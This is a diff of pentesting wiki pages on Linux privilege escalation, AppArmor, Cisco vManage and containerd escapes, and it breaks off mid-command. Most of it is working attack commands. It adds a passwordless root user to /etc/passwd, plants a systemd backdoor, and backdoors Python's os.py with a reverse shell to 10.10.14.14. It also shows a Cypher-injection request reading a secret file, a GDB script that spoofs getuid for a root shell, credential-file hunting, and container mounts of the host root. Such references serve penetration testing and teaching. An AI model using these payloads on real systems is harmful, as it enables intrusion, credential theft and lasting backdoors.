`/etc/ssh_config` can **override** this **options** and allow or denied this configuration. +The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` \(default is allow\). + +If you Forward Agent configured in an environment **\*\*\[**check here how to exploit it to escalate privileges\*\*\]\(ssh-forward-agent-exploitation.md\). + +## Interesting Files + +### Profiles files + +The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user run a new shell**. Therefore, if you can **write or modify any of the you can escalate privileges**. + +```bash +ls -l /etc/profile /etc/profile.d/ +``` + +If any weird profile script is found you should check it for **sensitive details**. + +### Passwd/Shadow Files + +Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of hem** and **check if you can read** them and **check if there are hashes** inside the files: + +```bash +#Passwd equivalent files +cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null +#Shadow equivalent files +cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null +``` + +In some occasions you can find **password hashes** inside the `/etc/passwd` \(or equivalent\) file + +```bash +grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null +``` + +#### Writable /etc/passwd + +First generate a password with one of the following commands. + +```text +openssl passwd -1 -salt hacker hacker +mkpasswd -m SHA-512 hacker +python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' +``` + +Then add the user `hacker` and add the generated password. + +```text +hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash +``` + +E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` + +You can now use the `su` command with `hacker:hacker` + +Alternatively you can use the following lines to add a dummy user without a password. +WARNING: you might degrade the current security of the machine. + +```text +echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd +su - dummy +``` + +NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. + +You should check if you can **write in some sensitive file**. For example, can you write to some **service configuration file**? + +```bash +find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody +for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user +``` + +For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines: + +```text +ExecStart=/path/to/backdoor +User=root +Group=root +``` + +Your backdoor will be executed the next time that tomcat is started. + +### Check Folders + +The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** \(Probably you won't be able to read the last one but try\) + +```bash +ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root +``` + +### Weird Location/Owned files + +```bash +#root owned files in /home folders +find /home -user root 2>/dev/null +#Files owned by other users in folders owned by me +for d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done +#Files owned by root, readable by me but no world readable +find / -type f -user root ! -perm -o=r 2>/dev/null +#Files owned by me or world writable +find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null +#Writable files by each group I belong to +for g in `groups`; + do printf " Group $g:\n"; + find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null + done +done +``` + +### Modified files in last mins + +```bash +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null +``` + +### Sqlite DB files + +```bash +find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null +``` + +### \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files + +```bash +fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`Hidden files +``` + +### Hidden files + +```bash +find / -type f -iname ".*" -ls 2>/dev/null +``` + +### **Script/Binaries in PATH** + +```bash +for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done +for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done +``` + +### **Web files** + +```bash +ls -alhR /var/www/ 2>/dev/null +ls -alhR /srv/www/htdocs/ 2>/dev/null +ls -alhR /usr/local/www/apache22/data/ +ls -alhR /opt/lampp/htdocs/ 2>/dev/null +``` + +### **Backups** + +```bash +find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/nulll +``` + +### Known files containing passwords + +Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**. +**Other interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac. + +### Logs + +If you can read logs, you may be able to find **interesting/confidential information inside of them**. The more strange the log is, the more interesting will be \(probably\). +Also, some "**bad**" configured \(backdoored?\) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). + +```bash +aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" +grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null +``` + +In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. + +### Shell files + +```bash +~/.bash_profile # if it exists, read once when you log in to the shell +~/.bash_login # if it exists, read once if .bash_profile doesn't exist +~/.profile # if it exists, read once if the two above don't exist +/etc/profile # only read if none of the above exist +~/.bashrc # if it exists, read every time you start a new shell +~/.bash_logout # if it exists, read when the login shell exits +~/.zlogin #zsh shell +~/.zshrc #zsh shell +``` + +### Generic Creds Search/Regex + +You should also check for files containing the word "**password**" in it's **name** or inside the **content**, also check for IPs and emails inside logs, or hashes regexps. +I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. + +## Writable files + +### Python library hijacking + +If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the os library and backdoor it \(if you can write where python script is going to be executed, copy and paste the os.py library\). + +To **backdoor the library** just add at the end of the os.py library the following line \(change IP and PORT\): + +```python +import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); +``` + +### Logrotate exploitation + +There is a vulnerability on `logrotate`that allows a user with **write permissions over a log file** or **any** of its **parent directories** to make `logrotate`write **a file in any location**. If **logrotate** is being executed by **root**, then the user will be able to write any file in _**/etc/bash\_completion.d/**_ that will be executed by any user that login. +So, if you have **write perms** over a **log file** **or** any of its **parent folder**, you can **privesc** \(on most linux distributions, logrotate is executed automatically once a day as **user root**\). Also, check if apart of _/var/log_ there are more files being **rotated**. + +{% hint style="info" %} +This vulnerability affects `logrotate` version `3.15.1` and below +{% endhint %} + +More detailed information about the vulnerability can be found in this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). + +You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). + +This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **\(nginx logs\),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks. + +### /etc/sysconfig/network-scripts/ \(Centos/Redhat\) + +If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**. + +Network scripts, _ifcg-eth0_ for example are used for network connections. The look exactly like .INI files. However, they are ~sourced~ on Linux by Network Manager \(dispatcher.d\). + +In my case, the `NAME=` attributed in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. Which means; **everything after the first blank space is executed as root**. + +For example: _/etc/sysconfig/network-scripts/ifcfg-1337_ + +```bash +NAME=Network /bin/id +ONBOOT=yes +DEVICE=eth0 +``` + +\(_Note the black space between Network and /bin/id_\) + +**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)\*\*\*\* + +### **init, init.d, systemd, and rc.d** + +`/etc/init.d` contains **scripts** used by the System V init tools \(SysVinit\). This is the **traditional service management package for Linux**, containing the `init` program \(the first process that is run when the kernel has finished initializing¹\) as well as some infrastructure to start and stop services and configure them. Specifically, files in `/etc/init.d` are shell scripts that respond to `start`, `stop`, `restart`, and \(when supported\) `reload` commands to manage a particular service. These scripts can be invoked directly or \(most commonly\) via some other trigger \(typically the presence of a symbolic link in `/etc/rc?.d/`\). \(From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d#:~:text=%2Fetc%2Finit%20contains%20configuration%20files,the%20status%20of%20a%20service.)\) +Other alternative to this folder is `/etc/rc.d/init.d` in Redhat + +`/etc/init` contains **configuration** files used by **Upstart**. Upstart is a young **service management package** championed by Ubuntu. Files in `/etc/init` are configuration files telling Upstart how and when to `start`, `stop`, `reload` the configuration, or query the `status` of a service. As of lucid, Ubuntu is transitioning from SysVinit to Upstart, which explains why many services come with SysVinit scripts even though Upstart configuration files are preferred. In fact, the SysVinit scripts are processed by a compatibility layer in Upstart. \(From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d#:~:text=%2Fetc%2Finit%20contains%20configuration%20files,the%20status%20of%20a%20service.)\) + +**systemd** is a **Linux initialization system and service manager that includes features like on-demand starting of daemons**, mount and automount point maintenance, snapshot support, and processes tracking using Linux control groups. systemd provides a logging daemon and other tools and utilities to help with common system administration tasks. \(From [here](https://www.linode.com/docs/quick-answers/linux-essentials/what-is-systemd/#:~:text=The%20%2Frun%2Fsystemd%2Fsystem,anywhere%20else%20in%20the%20system.)\) +Files that ships in packages downloaded from distribution repository go into `/usr/lib/systemd/`. Modifications done by system administrator \(user\) go into `/etc/systemd/system/`. + +## Other Tricks + +### NFS Privilege escalation + +{% page-ref page="nfs-no\_root\_squash-misconfiguration-pe.md" %} + +### Escaping from restricted Shells + +{% page-ref page="escaping-from-limited-bash.md" %} + +### Cisco - vmanage + +{% page-ref page="cisco-vmanage.md" %} + +### Kernel Security Protections + +* [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) +* [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) + +## More help + +[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries) + +## Linux/Unix Privesc Tools + +#### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) + +**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\(-t option\) +**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy) +**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check) +**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) +**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux) +**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop) +**Mestaploit:** _**multi/recon/local\_exploit\_suggester**_ +**Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester) +**EvilAbigail \(physical access\):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail) +**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) + +### Bibliography + +[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +[https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) +[https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744](https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744) +[http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html](http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html) +[https://touhidshaikh.com/blog/?p=827](https://touhidshaikh.com/blog/?p=827) +[https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf](https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf) +[https://github.com/frizb/Linux-Privilege-Escalation](https://github.com/frizb/Linux-Privilege-Escalation) +[https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) +[https://github.com/rtcrowley/linux-private-i](https://github.com/rtcrowley/linux-private-i) + diff --git a/linux-unix/privilege-escalation/apparmor.md b/linux-unix/privilege-escalation/apparmor.md new file mode 100644 index 00000000000..88204f06951 --- /dev/null +++ b/linux-unix/privilege-escalation/apparmor.md @@ -0,0 +1,242 @@ +# AppArmor + +## Basic Information + +**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources**. It's a Mandatory Access Control or **MAC** that binds **access control** attributes **to programs rather than to users**. +AppArmor confinement is provided via **profiles loaded into the kernel**, typically on boot. +AppArmor profiles can be in one of **two modes**: + +* **Enforcement**: Profiles loaded in enforcement mode will result in **enforcement of the policy** defined in the profile **as well as reporting** policy violation attempts \(either via syslog or auditd\). +* **Complain**: Profiles in complain mode **will not enforce policy** but instead **report** policy **violation** attempts. + +AppArmor differs from some other MAC systems on Linux: it is **path-based**, it allows mixing of enforcement and complain mode profiles, it uses include files to ease development, and it has a far lower barrier to entry than other popular MAC systems. + +### Parts of AppArmor + +* **Kernel module**: Does the actual work +* **Policies**: Defines the behaviour and containment +* **Parser**: Loads the policies into kernel +* **Utilities**: Usermode programs to interact with apparmor + +### Profiles path + +Apparmor profiles are usually saved in _**/etc/apparmor.d/**_ +With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder. + +For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_ + +### Commands + +```bash +aa-status #check the current status +aa-enforce #set profile to enforce mode (from disable or complain) +aa-complain #set profile to complain mode (from diable or enforcement) +apparmor_parser #to load/reload an altered policy +aa-genprof #generate a new profile +aa-logprof #used to change the policy when the binary/program is changed +aa-mergeprof #used to merge the policies +``` + +## Creating a profile + +* In order to indicate the affected executable, **absolute paths and wildcards** are allowed \(for file globbing\) for specifying files. +* To indicate the access the binary will have over **files** the following **access controls** can be used: + * **r** \(read\) + * **w** \(write\) + * **m** \(memory map as executable\) + * **k** \(file locking\) + * **l** \(creation hard links\) + * **ix** \(to execute another program with the new program inheriting policy\) + * **Px** \(execute under another profile, after cleaning the environment\) + * **Cx** \(execute under a child profile, after cleaning the environment\) + * **Ux** \(execute unconfined, after cleaning the environment\) +* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} \(add \#include <tunables/global> to the profile file\) +* **Deny rules are supported to override allow rules**. + +### aa-genprof + +To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**. +You just need to run: + +```bash +sudo aa-genprof /path/to/binary +``` + +Then, in a different console perform all the actions that the binary will usually perform: + +```bash +/path/to/binary -a dosomething +``` + +Then, in the first console press "**s**" and then in the recorded actions indicate if you want to ignore, allow, or whatever. When you have finished press "**f**" and the new profile will be created in _/etc/apparmor.d/path.to.binary_ + +{% hint style="info" %} +Using the arrow keys you can select what you want to allow/deny/whatever +{% endhint %} + +### aa-easyprof + +You can also create a template of an apparmor profile of a binary with: + +```bash +sudo aa-easyprof /path/to/binary +# vim:syntax=apparmor +# AppArmor policy for binary +# ###AUTHOR### +# ###COPYRIGHT### +# ###COMMENT### + +#include + +# No template variables specified + +"/path/to/binary" { + #include + + # No abstractions specified + + # No policy groups specified + + # No read paths specified + + # No write paths specified +} +``` + +{% hint style="info" %} +Note that by default in a created profile nothing is allowed, so everything is denied. You will need to add lines like `/etc/passwd r,` to allow the binary read `/etc/passwd` for example. +{% endhint %} + +You can then **enforce** the new profile with + +```bash +sudo apparmor_parser -a /etc/apparmor.d/path.to.binary +``` + +### Modifying a profile from logs + +The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions: + +```bash +sudo aa-logprof +``` + +{% hint style="info" %} +Using the arrow keys you can select what you want to allow/deny/whatever +{% endhint %} + +### Managing a Profile + +```bash +#Main profile management commands +apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode +apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain mode +apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile +apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile +``` + +## Logs + +Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**: + +```bash +type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 +type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 +``` + +You can also get this information using: + +```bash +sudo aa-notify -s 1 -v +Profile: /bin/service_bin +Operation: open +Name: /etc/passwd +Denied: r +Logfile: /var/log/audit/audit.log + +Profile: /bin/service_bin +Operation: open +Name: /etc/hosts +Denied: r +Logfile: /var/log/audit/audit.log + +AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021) +For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor +``` + +## Apparmor in Docker + +Note how the profile **docker-profile** of docker is loaded by default: + +```bash +sudo aa-status +apparmor module is loaded. +50 profiles are loaded. +13 profiles are in enforce mode. + /sbin/dhclient + /usr/bin/lxc-start + /usr/lib/NetworkManager/nm-dhcp-client.action + /usr/lib/NetworkManager/nm-dhcp-helper + /usr/lib/chromium-browser/chromium-browser//browser_java + /usr/lib/chromium-browser/chromium-browser//browser_openjdk + /usr/lib/chromium-browser/chromium-browser//sanitized_helper + /usr/lib/connman/scripts/dhclient-script + docker-default +``` + +By default **Apparmor docker-default profile** is generated from [https://github.com/moby/moby/blob/master/profiles/apparmor/template.go](https://github.com/moby/moby/blob/master/profiles/apparmor/template.go) + +**docker-default profile Summary**: + +* **Access** to all **networking** +* **No capability** is defined \(However, some capabilities will come from including basic base rules i.e. \#include <abstractions/base> \) +* **Writing** to any **/proc** file is **not allowed** +* Other **subdirectories**/**files** of /**proc** and /**sys** are **denied** read/write/lock/link/execute access +* **Mount** is **not allowed** +* **Ptrace** can only be run on a process that is confined by **same apparmor profile** + +Once you **run a docker container** you should see the following output: + +```bash +1 processes are in enforce mode. + docker-default (825) +``` + +Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS\_ADMIN capability is granted** because by default docker apparmor profile denies this access: + +```bash +docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash +echo "" > /proc/stat +sh: 1: cannot create /proc/stat: Permission denied +``` + +You need to **disable apparmor** to bypass its restrictions: + +```bash +docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash +``` + +Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS\_ADMIN capability. + +{% hint style="info" %} +Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**. +{% endhint %} + +### AppArmor Docker breakout + +You can find which **apparmor profile is running a container** using: + +```bash +docker inspect 9d622d73a614 | grep lowpriv + "AppArmorProfile": "lowpriv", + "apparmor=lowpriv" +``` + +Then, you can run the following line to **find the exact profile being used**: + +```bash +find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null +``` + +In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them. + diff --git a/linux-unix/privilege-escalation/cisco-vmanage.md b/linux-unix/privilege-escalation/cisco-vmanage.md new file mode 100644 index 00000000000..f586532f4ba --- /dev/null +++ b/linux-unix/privilege-escalation/cisco-vmanage.md @@ -0,0 +1,161 @@ +# Cisco - vmanage + +## Path 1 + +\(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)\) + +After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries \(accessible with an account on the Cisco website\), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`: + +```text + +vmanage:~$ ls -al /etc/confd/confd_ipc_secret + +-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret +``` + +Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability: + +```text + +GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1 + +Host: vmanage-XXXXXX.viptela.net + + + +[...] + +"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]} +``` + +The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell: + +```text + +vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret + +vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret + +vManage:~$ /tmp/confd_cli_user -U 0 -G 0 + +Welcome to Viptela CLI + +admin connected from 127.0.0.1 using console on vManage + +vManage# vshell + +vManage:~# id + +uid=0(root) gid=0(root) groups=0(root) +``` + +## Path 2 + +\(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)\) + +The blog¹ by the synacktiv team described an elegant way to get a root shell, but the caveat is it requires getting a copy of the `/usr/bin/confd_cli_user` which is only readable by root. I found another way to escalate to root without such hassle. + +When I disassembled `/usr/bin/confd_cli` binary, I observed the following: + +```text +vmanage:~$ objdump -d /usr/bin/confd_cli +… snipped … +40165c: 48 89 c3 mov %rax,%rbx +40165f: bf 1c 31 40 00 mov $0x40311c,%edi +401664: e8 17 f8 ff ff callq 400e80 +401669: 49 89 c4 mov %rax,%r12 +40166c: 48 85 db test %rbx,%rbx +40166f: b8 dc 30 40 00 mov $0x4030dc,%eax +401674: 48 0f 44 d8 cmove %rax,%rbx +401678: 4d 85 e4 test %r12,%r12 +40167b: b8 e6 30 40 00 mov $0x4030e6,%eax +401680: 4c 0f 44 e0 cmove %rax,%r12 +401684: e8 b7 f8 ff ff callq 400f40 <-- HERE +401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp) +40168f: e8 6c f9 ff ff callq 401000 <-- HERE +401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp) +40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi +4016a0: e8 7b f9 ff ff callq 401020 +4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp) +4016ac: 48 85 c0 test %rax,%rax +4016af: 0f 84 ad 03 00 00 je 401a62 +4016b5: ba ff 03 00 00 mov $0x3ff,%edx +4016ba: 48 89 c6 mov %rax,%rsi +4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi +4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt> +… snipped … +``` + +When I run “ps aux”, I observed the following \(_note -g 100 -u 107_\) + +```text +vmanage:~$ ps aux +… snipped … +root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash +… snipped … +``` + +I hypothesized the “confd\_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application. + +My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor \(-i 1015\) was created somewhere along the way and I cannot fake it. + +As mentioned in synacktiv’s blog\(last example\), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system. + +I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly. + +root.gdb: + +```text +set environment USER=root +define root + finish + set $rax=0 + continue +end +break getuid +commands + root +end +break getgid +commands + root +end +run +``` + +Console Output: + +```text +vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli +GNU gdb (GDB) 8.0.1 +Copyright (C) 2017 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "x86_64-poky-linux". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: +. +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done. +Breakpoint 1 at 0x400f40 +Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59 +59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) +0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59 +59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) +0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59 +59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) +0x0000000000401871 in ?? () +Welcome to Viptela CLI +root connected from 127.0.0.1 using console on vmanage +vmanage# vshell +bash-4.4# whoami ; id +root +uid=0(root) gid=0(root) groups=0(root) +bash-4.4# +``` + diff --git a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md new file mode 100644 index 00000000000..5fdab2933dc --- /dev/null +++ b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -0,0 +1,45 @@ +# Containerd \(ctr\) Privilege Escalation + +## Basic information + +Go to the following link to learn **what is containerd** and `ctr`: + +{% page-ref page="../../pentesting/2375-pentesting-docker.md" %} + +## PE 1 + +if you find that a host contains the `ctr` command: + +```bash +which ctr +/usr/bin/ctr +``` + +You can list the images: + +```bash +ctr image list +REF TYPE DIGEST SIZE PLATFORMS LABELS +registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - +registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - +``` + +And then **run one of those images mounting the host root folder to it**: + +```bash +ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash +``` + +## PE 2 + +Run a container privileged and escape from it. +You can run a privileged container as: + +```bash + ctr run --privileged --net-host 